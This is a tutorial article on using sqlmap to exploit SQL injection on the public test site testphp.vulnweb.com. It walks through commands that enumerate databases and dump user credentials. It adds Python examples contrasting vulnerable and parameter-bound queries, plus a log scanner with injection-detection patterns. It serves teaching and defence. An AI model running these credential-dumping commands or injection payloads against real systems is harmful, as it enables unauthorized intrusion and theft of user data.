SQL Injection Attack Using sqlmap Tool
In this article, I’ll elaborate on a step-by-step method of using the sqlmap tool.
We will attack a sample website set up for testing, not a live one; trying this on somebody else’s website without permission is illegal. It is best to try it on your own website; otherwise, use a sample website built for this purpose.
Requirements
- Kali Linux Machine (attacking machine)
- sqlmap tool
Let’s start.
- Open browser
- Type:
vulnweb.com
As you can see on the screen, there are four links available. I used the link for ‘acuart’.
Here, we want to find the username and password.
- Copy the link
- Open new tab
- Type:
site:<paste-website-link> php?id=
This search lists pages on that site whose URLs carry an id parameter in the query string, which is where we look for a parameter to test.
http://testphp.vulnweb.com/artists.php?artist=1
A link that passes a value straight from the query string into the page, like this one, is the type we need to attack. So, copy it.
- Open the terminal of the Kali Linux machine.
- Type:
sqlmap -u <link> --dbs
You see, we have two databases here.
information_schema is a built-in MySQL database; we will use the acuart database to list its tables.
- Type:
sqlmap -u <link> -D acuart --tables
After running this command, it shows the table names.
I will use the users table to list its columns.
- Type:
sqlmap -u <link> -D acuart -T users --columns
After running this command, it shows the column names.
I will use the uname column to find the username.
- Type:
sqlmap -u <link> -D acuart -T users -C uname --dump
You see, it will give us the username.
So, again, I will use the pass column to find the password.
- Type:
sqlmap -u <link> -D acuart -T users -C pass --dump
You see, it will give us the password.
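The reason sqlmap could walk from the artist parameter all the way to the users table is that the page pastes the parameter into its SQL text. The following is an added example (not the code behind testphp.vulnweb.com and not part of the original article) that rebuilds that situation on a constructed in-memory SQLite table: lookup_vulnerable concatenates the parameter into the query, while lookup_hardened validates it as an integer and binds it as a parameter, so the same tautology input returns nothing.

```python
import sqlite3

# Constructed sample rows standing in for an "artists" table; the names are
# made up for this illustration.
SAMPLE_ARTISTS = [(1, "alpha"), (2, "beta"), (3, "gamma")]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)", SAMPLE_ARTISTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, artist):
    """Vulnerable pattern: the request parameter becomes part of the SQL text.

    Anything the client sends in 'artist' is parsed by the database as SQL,
    which is exactly what sqlmap exploits when it enumerates databases.
    """
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id = " + artist
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, artist):
    """Hardened pattern: validate the type, then bind the value.

    A bound parameter is sent separately from the statement, so it can only
    ever be compared as a value and never changes the shape of the query.
    """
    try:
        artist_id = int(artist)
    except (TypeError, ValueError):
        # Reject anything that is not a plain integer id.
        return []
    return conn.execute(
        "SELECT artist_id, aname FROM artists WHERE artist_id = ?", (artist_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 OR 1=1"):
        print(f"vulnerable({value!r}) -> {lookup_vulnerable(db, value)}")
        print(f"hardened({value!r})   -> {lookup_hardened(db, value)}")
```

With the plain id "1" both functions return the single matching row; with the tautology input the concatenating version returns every row, while the bound version rejects the input before it reaches the database.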
You see that the username and password were retrieved successfully.
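From the defender's side, the enumeration above leaves a clear trail in the web server's access log: sqlmap's default User-Agent names the tool, and its probes place SQL fragments in the tested parameter. This added example (not from the original article; the log lines are constructed and the User-Agent string is a made-up sample in sqlmap's format) parses combined-format log lines and flags requests by either signal, then groups the hits per client address, since a scanner sends many probes against the same parameter.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed access-log lines in combined log format; none are real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 1043 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /artists.php?artist=1%20AND%201%3D1 HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 998 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:43 +0000] "GET /artists.php?artist=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Coarse markers of SQL being smuggled through a parameter value. These are
# tuning starting points for a detection rule, not an exhaustive signature set.
SQLI_MARKERS = re.compile(
    r"(?i)(\bunion\b\s+\bselect\b"      # stacked SELECT through UNION
    r"|\bsleep\s*\("                    # time-based probing
    r"|\b(and|or)\b\s+\d+\s*=\s*\d+"    # boolean tautology such as AND 1=1
    r"|'\s*(or|and)\b"                  # quote-break followed by a condition
    r"|--\s*$|/\*)"                     # trailing SQL comment
)


def classify(line):
    """Parse one log line and return its client, path and the reasons it was flagged."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; leave it for another parser
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    # parse_qsl percent-decodes the values, so encoded payloads are inspected in clear.
    for name, value in parse_qsl(urlparse(m["path"]).query, keep_blank_values=True):
        if SQLI_MARKERS.search(value):
            reasons.append(f"sql marker in parameter {name!r}")
    return {"ip": m["ip"], "path": m["path"], "reasons": reasons}


def scan_log(text):
    """Return the records of every request that triggered at least one reason."""
    hits = []
    for line in text.splitlines():
        rec = classify(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


def noisy_clients(text, threshold=2):
    """Group flagged requests by client; repeated probes from one address are the scanner signature."""
    counts = {}
    for rec in scan_log(text):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["ip"], rec["path"], rec["reasons"])
    print("clients over threshold:", noisy_clients(SAMPLE_LOG))
```

The User-Agent check only catches the default configuration, since sqlmap can be told to use a browser-like string; the parameter markers and the per-client count are what survive that change, and both are worth wiring into an alert on the web tier of any application that takes ids in the query string.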
Thank you for reading this article. I hope that you have found the information provided to be valuable and helpful. Use it for educational purposes only. 🙂
RADEEL AHMAD